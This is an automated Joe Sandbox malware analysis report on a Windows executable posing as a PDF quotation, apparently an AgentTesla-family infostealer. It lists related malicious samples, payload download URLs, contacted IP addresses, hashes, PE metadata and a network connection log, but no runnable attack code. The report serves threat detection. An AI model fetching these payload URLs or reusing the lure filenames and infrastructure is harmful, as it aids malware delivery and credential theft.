                                                  53334TUT-ASUSfalse
                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1430332
                                                  Start date and time:2024-04-23 14:44:05 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 10s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:6
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:QUOTATION_APRQTRA031244PDF.scr.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 189
                                                  • Number of non-executed functions: 11
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • VT rate limit hit for: QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                                                  TimeTypeDescription
                                                  14:44:53API Interceptor588x Sleep call for process: QUOTATION_APRQTRA031244#U00faPDF.scr.exe modified
                                                  14:45:52API Interceptor91809x Sleep call for process: aspnet_compiler.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  104.21.13.139QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • filetransfer.io/data-package/EN1H0b0j/download
                                                  Payment Slip (SWIFT)#U00b7PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                  • filetransfer.io/data-package/sooHKfZ9/download
                                                  Payment Slip (SWIFT)#U00b7PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                  • filetransfer.io/data-package/sooHKfZ9/download
                                                  QUOTATION_OCTQTRFA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • filetransfer.io/data-package/XPL9HUmM/download
                                                  QUOTATION_OCTQTRFA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • filetransfer.io/data-package/S5VZI7QF/download
                                                  ORDER_LIST_OCTQTRFA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • filetransfer.io/data-package/9uranKMp/download
                                                  QUOTATION_OCTQTRFA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • filetransfer.io/data-package/Kj1jXnxr/download
                                                  Kargo Konsinyesi^^ICNIR00112339^20210630^^^ACC^^^^^TR^^^PL^^BL^^PDF.exeGet hashmaliciousAveMariaBrowse
                                                  • filetransfer.io/data-package/4fDOVZr6/download
                                                  PO_IN00043INBOM_Specifications Sheet^^^^^dwg.exeGet hashmaliciousAveMariaBrowse
                                                  • filetransfer.io/data-package/9e4jI1vN/download
                                                  New year order-01069022^^^PDF.exeGet hashmaliciousAveMariaBrowse
                                                  • filetransfer.io/data-package/KOeMWG3f/download
                                                  208.95.112.1Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  cb9YYjPyUR.jarGet hashmaliciousSTRRATBrowse
                                                  • ip-api.com/json/
                                                  Ship Docs_ CI_BL_HBL_.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  sZXuT60Q6P.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Comprobante.xlam.xlsxGet hashmaliciousGuLoaderBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  TRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  BNP Paribas_RemittanceAdviceNotification106173036326.docGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  filetransfer.ioQUOTATION_APRQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 172.67.200.96
                                                  24crypted.exeGet hashmaliciousUnknownBrowse
                                                  • 172.67.200.96
                                                  24crypted.exeGet hashmaliciousUnknownBrowse
                                                  • 104.21.13.139
                                                  QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 172.67.200.96
                                                  DHL - OVERDUE ACCOUNT NOTICE -1301858139#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 104.21.13.139
                                                  l8p4UP25ft.exeGet hashmaliciousAveMaria, GuLoader, PrivateLoaderBrowse
                                                  • 172.67.200.96
                                                  Payment Slip (SWIFT)#U00b7PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                  • 104.21.13.139
                                                  Payment Slip (SWIFT)#U00b7PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                  • 104.21.13.139
                                                  e.exeGet hashmaliciousUnknownBrowse
                                                  • 104.21.13.139
                                                  e.exeGet hashmaliciousUnknownBrowse
                                                  • 172.67.200.96
                                                  ip-api.comWire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  cb9YYjPyUR.jarGet hashmaliciousSTRRATBrowse
                                                  • 208.95.112.1
                                                  Ship Docs_ CI_BL_HBL_.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  sZXuT60Q6P.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Comprobante.xlam.xlsxGet hashmaliciousGuLoaderBrowse
                                                  • 208.95.112.1
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  TRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 208.95.112.1
                                                  Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 208.95.112.1
                                                  BNP Paribas_RemittanceAdviceNotification106173036326.docGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  s22.filetransfer.ioQUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 172.67.200.96
                                                  SecuriteInfo.com.W32.ModiLoader.YK.tr.11853.21891.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 104.21.13.139
                                                  Purchase Order 0342024.exeGet hashmaliciousRemcosBrowse
                                                  • 104.21.13.139
                                                  rNEWORDER28938928384893029.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                                  • 104.21.13.139
                                                  rSW-Purchase_or.exeGet hashmaliciousAveMariaBrowse
                                                  • 188.114.96.7
                                                  Order-202303007-pdf.scr.exeGet hashmaliciousAveMariaBrowse
                                                  • 188.114.96.3
                                                  PO_IN00043INBOM_Specifications Sheet^^^^^dwg.scr.exeGet hashmaliciousAveMariaBrowse
                                                  • 188.114.97.3
                                                  ADLINK-TECH PO#2220002637.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                  • 188.114.97.3
                                                  vVk8dcU6G4.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                  • 188.114.96.3
                                                  SecuriteInfo.com.BackDoor.SiggenNET.35.30620.exeGet hashmaliciousAveMariaBrowse
                                                  • 188.114.96.3
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  TUT-ASUSWire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  cb9YYjPyUR.jarGet hashmaliciousSTRRATBrowse
                                                  • 208.95.112.1
                                                  Ship Docs_ CI_BL_HBL_.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  sZXuT60Q6P.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Comprobante.xlam.xlsxGet hashmaliciousGuLoaderBrowse
                                                  • 208.95.112.1
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  TRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 208.95.112.1
                                                  Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 208.95.112.1
                                                  BNP Paribas_RemittanceAdviceNotification106173036326.docGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  CLOUDFLARENETUSIntegraconnect Play Now 484 484 6292.htmGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.2.184
                                                  https://www.ne16.com/t/4177044/70602841/2927387/1/124665/?f8785874=aHR0cHM6Ly93b29kLWRlY2sub3JnL3BkZi85SWRac1p5aTJEeWh3ZUcvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWEM4YXAvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWTJOc1lYSmxRR0psYkd4d1lYSjBibVZ5YzJsdVl5NWpiMjA9Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  http://hr-lumentum.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                  • 104.17.2.184
                                                  http://hr-lumentum.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                  • 104.17.2.184
                                                  S9a6M5G4R2v0t05579802009.htmlGet hashmaliciousUnknownBrowse
                                                  • 172.67.215.47
                                                  copy#10476235.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 172.67.74.152
                                                  Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.26.12.205
                                                  DHL_RF_20200712_BN_OTN 0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 104.26.12.205
                                                  tributario_fdo.zipGet hashmaliciousUnknownBrowse
                                                  • 1.1.1.1
                                                  BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.74.152
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0ecopy#10476235.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 104.21.13.139
                                                  Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.13.139
                                                  DHL_RF_20200712_BN_OTN 0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 104.21.13.139
                                                  j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                  • 104.21.13.139
                                                  http://pluralism.themancav.com/Get hashmaliciousUnknownBrowse
                                                  • 104.21.13.139
                                                  BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.13.139
                                                  Ship Docs_ CI_BL_HBL_.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.13.139
                                                  sZXuT60Q6P.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.13.139
                                                  Urgent PO 18-3081 Confirmation.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.13.139
                                                  171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.13.139
                                                  No context
                                                  Process:C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1248
                                                  Entropy (8bit):5.347863460191528
                                                  Encrypted:false
                                                  SSDEEP:24:MLV1qE4qpE4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeRE4K5sXE4qdKm:Mp1qH2HKlYHKh3oPtHo6hAHKzeRHKMHA
                                                  MD5:18F2D975E7BC9B37956ADE1E5E65605A
                                                  SHA1:91C2FE3F3486045C471FAC37871355C2D77DC9AA
                                                  SHA-256:D5AE3EC7F9D14F342320A0656FE4B00A8DCEEC2F558080195E7300AE51631663
                                                  SHA-512:0C0CC95FFF8D684DC2BA33DFAEBD41806F61F387074133C86B0F98FB0F09B9EB3DCE8BF38AE4EE04D6371275B2ECB94D447555120B940B93669C325FFFC3D130
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, Publi
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.441967098822087
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                                                  File size:249'072 bytes
                                                  MD5:715a6e943fbaf2e9205a70e391d0fd1c
                                                  SHA1:acc6f23393b146fc1c815b06c322280ac27d50ba
                                                  SHA256:a22b502cc5b1476fef59963f2df2eaea9086e775923d82308cecac83d5c5cbcd
                                                  SHA512:fba1ea4fac8d347f91de299a31fb23e45bacc1826110a5074a33e37907293921965d5a4ae5441b3817a0bbc88d66d93bda87050b4ad5ffe7e77e8ec3c22d169b
                                                  SSDEEP:6144:UE08tYLyZZEXrdm4Vz0RpppppppppppppppppppppppppppppbF:U9Xrdm4Vz0Rppppppppppppppppppppz
                                                  TLSH:DE341882E8006264EE59AB346A33CD3507227DBDAD78D42D24E97D4B3FBFAD36019417
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'&f.............................1... ...@....@.. ....................................`................................
                                                  Icon Hash:c5b492b6b69c85d1
                                                  Entrypoint:0x4031ea
                                                  Entrypoint Section:.text
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6626271E [Mon Apr 22 09:00:14 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Signature Valid:false
                                                  Signature Issuer:CN=Symantec Class 3 Extended Validation Code Signing CA - G2, OU=Symantec Trust Network, O=Symantec Corporation, C=US
                                                  Signature Validation Error:The digital signature of the object did not verify
                                                  Error Number:-2146869232
                                                  Not Before, Not After
                                                  • 01/04/2016 01:00:00 02/04/2017 00:59:59
                                                  Subject Chain
                                                  • CN=PENTA SECURITY SYSTEMS INC., O=PENTA SECURITY SYSTEMS INC., L=Yeongdeungpo-gu, S=Seoul, C=KR, SERIALNUMBER=116-81-65189, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=KR
                                                  Version:3
                                                  Thumbprint MD5:26014BF229063B8AF8B9D95A61E63003
                                                  Thumbprint SHA-1:221FD06A67A578DDBAC7EEABD90128FBA5665628
                                                  Thumbprint SHA-256:DC250AEAE362F1E953780582CBD0BCD406A646E3ED939EB6D7BB3410D0022758
                                                  Serial:25967C4AF7D540BE9EB9A51D8E12A76B
                                                  Instruction
                                                  jmp dword ptr [004031F8h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  int3
                                                  xor dword ptr [eax], eax
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x319c0x4c.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x38169.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x398000x34f0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x31f80x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x12000x12007149ff22d6edc80190ad2718067ef3f4False0.578125data5.619616480126674IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x40000x381690x382002ff513859b28bd0c530724fd1aa25e7dFalse0.3084197522271715data5.200668533838594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x3e0000xc0x200db981a661028044fc525ddda24508648False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x43200x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.38353658536585367
                                                  RT_ICON0x49980x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.48655913978494625
                                                  RT_ICON0x4c900x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.5286885245901639
                                                  RT_ICON0x4e880x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5878378378378378
                                                  RT_ICON0x4fc00x6739PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9933017975402081
                                                  RT_ICON0xb7090xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.5578358208955224
                                                  RT_ICON0xc5c10x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.6367328519855595
                                                  RT_ICON0xce790x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.6497695852534562
                                                  RT_ICON0xd5510x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.47760115606936415
                                                  RT_ICON0xdac90x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.125
                                                  RT_ICON0x1e3010x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.21113622030691612
                                                  RT_ICON0x277b90x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 265600.21157894736842106
                                                  RT_ICON0x2dfb10x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.24269870609981517
                                                  RT_ICON0x334490x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.22325224374114314
                                                  RT_ICON0x376810x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.3196058091286307
                                                  RT_ICON0x39c390x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.3642120075046904
                                                  RT_ICON0x3acf10x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.5086065573770492
                                                  RT_ICON0x3b6890x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5735815602836879
                                                  RT_GROUP_ICON0x3bb010x102data0.6007751937984496
                                                  RT_VERSION0x3bc130x35cdata0.4790697674418605
                                                  RT_MANIFEST0x3bf7f0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                  DLLImport
                                                  mscoree.dll_CorExeMain
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 23, 2024 14:44:54.297084093 CEST4973680192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.401875019 CEST8049736104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:54.402132988 CEST4973680192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.403248072 CEST4973680192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.507812023 CEST8049736104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:54.734833002 CEST8049736104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:54.734872103 CEST8049736104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:54.735011101 CEST4973680192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.739854097 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.739906073 CEST44349737104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:54.740005970 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.753973007 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.754043102 CEST44349737104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:54.979094028 CEST44349737104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:54.979207039 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.983355999 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:54.983370066 CEST44349737104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:54.983673096 CEST44349737104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:55.024485111 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:55.033107996 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:55.080121994 CEST44349737104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:55.729078054 CEST44349737104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:55.729163885 CEST44349737104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:55.729243994 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:55.737155914 CEST49737443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:55.846827030 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:55.846864939 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:55.846940994 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:55.847364902 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:55.847373962 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:56.063981056 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:56.064105034 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:56.065562010 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:56.065579891 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:56.065814972 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:56.067389011 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:56.112118006 CEST44349738104.21.13.139192.168.2.4
